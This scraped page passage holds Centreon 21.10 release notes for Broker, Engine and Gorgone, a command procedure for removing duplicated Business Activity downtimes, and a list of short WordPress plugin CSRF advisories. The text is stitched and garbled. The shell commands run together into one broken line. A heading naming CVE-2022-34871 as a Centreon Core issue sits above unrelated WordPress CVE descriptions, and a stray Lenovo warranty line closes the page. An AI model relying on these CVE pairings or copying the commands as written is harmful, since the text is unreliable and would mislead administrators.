*   Improved the multiplexing of events, which was a performance bottleneck. The processing speed of queued events should be significantly increased.
*   Some TLS trace logs were logged as errors, flooding the log file.
*   The SQL connections stats have been added to the broker stats available via gRPC.
*   Added the SQL Manager statistics in gRPC and stabilized the stats provider.
*   Added to LUA Stream Connectors' perfdata label parser the compatibility with centreon-plugins new metrics naming convention.

**Bug fixes​**

*   Fixed a regression due to the central broker's cache generation optimization, which was too thorough and prevented BAM from computing KPIs based on boolean rules
*   The central broker's cache generation loaded too much data and took too much time when BAM was activated.
*   Fixed an issue that could cause segmentation faults in centreon-engine when scheduling external commands
*   Fixed a design issue to avoid trying to access variables of broker's new logger when the logger was stopped. This issue could cause segmentation faults.
*   When a single metric is deleted, the corresponding RRD file is now actually removed.
*   If the SQL stream took too long to initialize its connection, then the Perfdata stream timed out and the whole connection failed. To fix this, the timeout has been increased.
*   In some circumstances, the mysql_ping function, which is used to test if the session is still active, could freeze. To fix this, the calls to mysql_ping have been spaced out, a timeout has been added, and the commit management has been consolidated.
*   Fixed an issue causing BAM Business Activities (best status) to remain in an OK state when the OK KPIs were removed
*   Refactored the BAM Business activities downtimes inheritance mechanism so that they are properly inherited and not duplicated anymore.

> After having updated centreon-broker to this version, you may still have unwanted remaining downtimes on your Business Activities. It can happen if a downtime that was inherited from a KPI has been duplicated and if the original downtime ended before the bugfix was installed. In that case, you will have to apply the following procedure.

    systemctl stop centenginesed -i -zE 's/(servicecomment|servicedowntime) \{\nhost_name=_Module_BAM_1\n[^}]*\}\n//g' /var/log/centreon-engine/retention.datsystemctl start centengine

All the downtimes applied on Business Activities have now been removed.

You must then restart the centengine service on all the other pollers to restore the legitimate inherited downtimes.

**21.10.0​****Centreon Engine​**

*   Flapping now starts only on non-OK states. Based on PR #523
*   Flapping now starts only for services of UP hosts or for hosts with UP parent. Based on PR #524. Fixes Issue #192
*   Provide feedback on gRPC client execution success/failure

**Centreon Broker​**

*   Queues (in memory and retention files) are now cleared for reversed broker flows without peer retention when the connection is reset. This is a change of behavior back to what it should have always been. It will prevent endless retention files for Centreon-Studio (Centreon-Map).
*   \[BETA\] Centreon-broker is now able to use OpenSSL instead of GNUTLS and allows forcing TLS/SSL version and cipher suite
*   Broker now only loads the modules that are necessary for its inputs and outputs
*   Old broker log format has been removed

**Centreon Gorgone​****21.10.2​**

Release date: February 17, 2022

**Enhancements​**

*   Added an "audit" module to Gorgone to provide an overview of the system status, package versions, + some Centreon metrics.
*   Added a new "httpserverng" module to allow asynchronous API calls.

**Bugfixes​**

*   Fixed an issue that caused Service Discovery scans to fail because the wrong message was caught.
*   Fixed an issue that could make Gorgone crash in pull mode.
*   Fixed uninitialized values in Gorgone that could cause error log messages.
*   Fixed an issue that prevented Gorgone from handling advanced Service Discovery features correctly.
*   Fixed an issue in the module management that could cause crashes.

**21.10.1​**

Release date: December 14, 2021

**Bugfixes​**

*   Make Gorgone’s private key readable by centreon-gorgone only
*   Gorgone was too long to restart, which could cause the service to reach the systemctl timeout. The time to stop has been thoroughly decreased.

**21.10.0​**

*   Add IPv6 support

CVE-2022-34871: Centreon Core | Centreon Documentation

The LiveSync for WordPress plugin through 1.0 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack

CVE-2022-1712

The Comment License WordPress plugin before 1.4.0 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack

CVE-2022-1957

The Rotating Posts WordPress plugin through 1.11 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack

CVE-2022-1847

The Seamless Donations WordPress plugin before 5.1.9 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack

CVE-2022-1610

The QuickSwish WordPress plugin before 1.1.0 does not have CSRF check when activating plugins, which could allow attackers to make logged in admins activate arbitrary plugins present on the blog via a CSRF attack

Search

lenovo warranty check/lookup | check warranty status | lenovo support us